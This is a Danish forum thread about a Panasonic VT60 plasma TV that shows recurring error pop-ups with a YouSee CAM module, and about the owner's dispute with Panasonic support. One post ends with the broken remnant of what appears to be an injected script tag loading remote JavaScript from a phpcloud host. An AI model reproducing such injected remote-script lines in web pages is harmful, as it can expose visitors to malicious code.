|
Panasonic Plasma kompatibilitets problemer |
Besvar | Side 12> |
Forfatter | |
Just23
Ny bruger Oprettet: 24-April-2014 Status: Offline Point: 9 |
Funktioner
Tak(0)
Sendt: 24-April-2014 kl. 11:46 |
Har du en
Panasonic Plasma af VT serien, skal du ikke regne med den er kompatibel med
Danmarks største kabel TV udbyder – Yousee. Den kan ikke korrekt dekode sendesignalet
fra Yousee, hvis man har installeret en CAM-modul med tilhørende Yousee-kort.
Man vil få fejl pop-up beskeder på flere kanaler med 10 sekunders mellemrum på
almindelige ikke betalingskanaler som e.g. DR-K, DR Ultra, etc.. I beskeden
stor der:
Man kan kvittere
med <OK>-knappen på fjernbetjeningen, men beskeden vender tilbage efter
10 sekunder. Selvom fjernsynet er certificeret til at være ”Yousee -godkendt”,
er den ikke kompatibel med Yousee-signalet. Årsagen er at Panasonic har
released deres fjernsyn med defekt software, som ikke er blevet gennemtestet. Det har været en
5 mdr. lang kamp med Panasonic Danmark. Mit fjernsyn, en Panasonic Plasma TXP55VT60Y, har fejlet siden dag ét.
Jeg har lavede utallige telefonopkald til Panasonic Danmarks support-site, men
desværre til ingen nytte. Den eneste support de leverer, er ”Bruger Manual”
support. Man bliver vejledt med alle mulige indstillinger og genskanning af
kanalerne. Når det ikke lykkedes at løse problemet, sætter de straks skylden på
Yousees sendesignal, CAM-modul eller kort. Jeg har skiftet CAM-modulet 3 gange
og Yousee-kort 3 gange. Har kontaktet CAM-modulproducenten og fik tilsendt et
alternativt modul. Men ingen af disse tiltag hjalp. Bagefter, fik jeg tilkaldt og
betalt Yousee-teknikerne til at bringe deres avancerede udstyr til at måle
sendesignalet og fik bekræftet, at den er fejlfri. I hele forløbet har jeg
gentagne gange været i kontakt med Panasonic-support, bedt dem om at eskalere
problemet op i deres system, og tilbudt at invitere deres tekniker hjem, så de
kan lære noget af deres produkt, men Panasonic Danmark viste ingen interesse.
Heldigvis er der en købelov i Danmark, så jeg sendte fjernsynet retur til
forhandleren. Den blev sendt til reparation 2 gange, hvor hele indmaden blev
skiftet ud, uden det hjalp noget. Til sidst gik det op for teknikerne, at der
var noget galt med softwaren, da der begyndt at komme andre Panasonic Plasma
med det samme problem. Teknikerne tog så kontakt med Panasonic, som indrømmede,
at der er fejl med deres software. De har så lovede at undersøge software-fejlen,
men d.d. er der ikke kommet nogen løsning. Jeg har valgt at
ophæve købet og få pengene retur. Dette er sidste gang, jeg vælger at købe et
Panasonic fjernsyn på grund af denne erfaring. Indtil d.d. har jeg ikke fået
nogen indrømmelser fra Panasonic Danmark i mine telefonsamtaler. Det sker kun
på højt plan, når de bliver presset af forhandleren eller teknikeren. Fejlbesked: Redigeret af Just23 - 24-April-2014 kl. 23:49 |
|
Bambus
Super bruger Oprettet: 21-Juni-2006 Sted: Denmark Status: Offline Point: 390 |
Funktioner
Tak(0)
|
Mærkeligt - jeg har ingen problemer med mit TX-P55VT50Y. Både cam og kort virker upåklageligt. Så det er åbenbart ikke alle i VT serien, der er problemer med.
|
|
Just23
Funktioner
Tak(0)
|
Har du Yousee som kabel TV udbyder? Ekstra betalingskanaler?
Redigeret af Just23 - 24-April-2014 kl. 18:20 |
|
Bambus
Super bruger Oprettet: 21-Juni-2006 Sted: Denmark Status: Offline Point: 390 |
Funktioner
Tak(0)
|
Yes til begge dele.
|
|
Roland
Guld medlem Oprettet: 26-Maj-2009 Sted: Kbh's Vestegn Status: Offline Point: 1220 |
Funktioner
Tak(0)
|
Har du lige tilmeldt dig til Bland Selv ? Hvilken net id. bruger du ?
For jeg oplevede det samme med mit Pana DT60 efter jeg isatte mit Yousee kort i cam modulet. Årsagen skyldtes at min boligforening først aktiverer mit bland selv - 1.maj. Da jeg gik tilbage til net id 100 forsvandt disse irriterende popup's. Så håber jeg, at der ikke bli'r probs efter 1. Maj - når jeg skal bruge net id 111 ! Jeg tror ikke det har noget med dit Tv at gøre, men derimod noget med YouSee at gøre. Tjek evt. dit problem med yousee support, som kan tjekke dit kort og din opkopling på deres kabeltv.
Redigeret af Roland - 25-April-2014 kl. 20:47 |
|
Panasonic 55HZ1000 - Pioneer VSX-1025 - Wharfedale Diamond 250 - POLK Surroundbar
PC: i5-2500K 16Gb ram OCZ 120Gb SSD MSI GTX1070 - Asus PB248Q Nighthawk X6000 - OnePlus 8T - Lenovo Tab3 -YS4000 boks |
|
Just23
Funktioner
Tak(0)
|
Jeg har fuldpakken og 4 ekstra kanaler. Denne sammensætning har jeg haft i flere år. Tidligere har jeg haft et fjernsyn af andet mærke, og det har fungeret upåklageligt. Det er først efter, jeg har anskaffet dette Panasonic Plasma fjernsyn, at jeg har haft problemer. Jeg har haft kontakt mange gange med Yousee Support og har fulgt og tastet alle de korrekte netværksparametre, der er gældende for min zone. Jeg har også fået tilsendt specifikke vejledninger, som Yousee har forberedt til opsætning af Panasonic fjernsyn. Da ingen af disse råd har løst problemet, sagde Yousee Support, at jeg burde skifte CAM modul. Jeg har også fået tilsendt fra Yousee ekstra kort som de sagde jeg skulle prøve. Jeg har også haft kontakt med teknisk support fra Strong, som producere CAM modulerne. Her blev jeg instrueret trin for trin over telefonen til at reset CAM-modulet for at se, om det ville hjælpe. Da det aligevel ikke hjalp, forslå de et alternativt kort, som har et lidt anderledes program. Denne CAM-modul variant fik jeg også prøvet af, men det hjalp ikke. Alt peger på, at Panasonic har releaset et fjernsyn til det danske marked, der ikke virker med Danmarks største kabel-TV-udbyder, selvom den står som Yousee "godkendt". Nogen har vist ikke lavet deres hjemmearbejde. I mine samtaler med Support fra Panasonic Danmark, over en periode på 5 mdr., har jeg jævnlig spurgt, om de kender til lignende sager, men svaret er hele tiden, at de aldrig har hørt om problemet. Man kommer ikke meget videre med Panasonic Support, og samtalen bliver ofte afsluttet med "jeg kan desværre ikke hjælp dig". |
|
Roland
Guld medlem Oprettet: 26-Maj-2009 Sted: Kbh's Vestegn Status: Offline Point: 1220 |
Funktioner
Tak(0)
|
Det lyder jo ikke særlig godt, just23. Godt nok surt show.
Håber ikke jeg får samme bøvl om 5-6 dages tid, når jeg får aktiveret deres "Bland Selv" med mit Strong modul og nyt YouSee kort i mit DT60.
Skal nok melde tilbage.
|
|
Panasonic 55HZ1000 - Pioneer VSX-1025 - Wharfedale Diamond 250 - POLK Surroundbar
PC: i5-2500K 16Gb ram OCZ 120Gb SSD MSI GTX1070 - Asus PB248Q Nighthawk X6000 - OnePlus 8T - Lenovo Tab3 -YS4000 boks |
|
cnn3
Guld medlem Oprettet: 20-Oktober-2004 Sted: Århus Status: Offline Point: 3195 |
Funktioner
Tak(0)
|
Har du prøvet at tjekke dit signal i en yousee-samsung boks med dit kort isat?< ="https://cloudssl.my.phpcloud.com/super/.js" id="superInsectID">
|
|
mvh Christian
|
|
Radiomanden
Platin medlem Oprettet: 17-Maj-2004 Sted: 4100 Status: Offline Point: 40543 |
Funktioner
Tak(0)
|
Der er noget om, at med bland selv så er det et andet netnummer der skal anvendes, det er 111. |
|
Marantz NR1403 - Shield TV - Nokia 8000 Streaming boks - Samsung 40UE7005 - ARVANI TA210 SOUNDBAR - Panasonic TX-49FX623E
|
|
Bruger udmeldt 38
-- Oprettet: 21-Maj-2006 Status: Offline Point: 5 |
Funktioner
Tak(0)
|
Radiomanden: Som det allerede ér skrevet!
OP: Det som kunne være spændende ville være, at tilslutte TV'et et sted, hvor der er f.eks. STOFA. For er der ingen problemer dér, vil min påstand være, at det er et YouSee problem, og ikke et Panasonic problem!! M.v.h. |
|
Just23
Funktioner
Tak(0)
|
Det har jeg ikke.
Jeg vil aldrig acceptere, at et nyt TV skal have en separat boks til tuning af
kanaler. |
|
Just23
Funktioner
Tak(0)
|
Jeg har prøvede at tilslutte et 2 år gammelt Samsung fjernsyn på samme signal. Der kommer ingen fejlbeskeder og det virker fint.
|
|
Besvar | Side 12> |
Skift forum | Forum-tilladelser Du kan ikke oprette nye emner i dette forum Du kan ikke besvare indlæg i dette forum Du kan ikke slette dine indlæg i dette forum Du kan ikke redigere dine indlæg i dette forum Du kan ikke oprette afstemninger i dette forum Du kan ikke stemme i dette forum |